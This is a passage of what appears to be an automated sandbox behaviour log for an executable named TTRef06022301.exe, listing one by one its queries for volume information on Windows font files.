Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
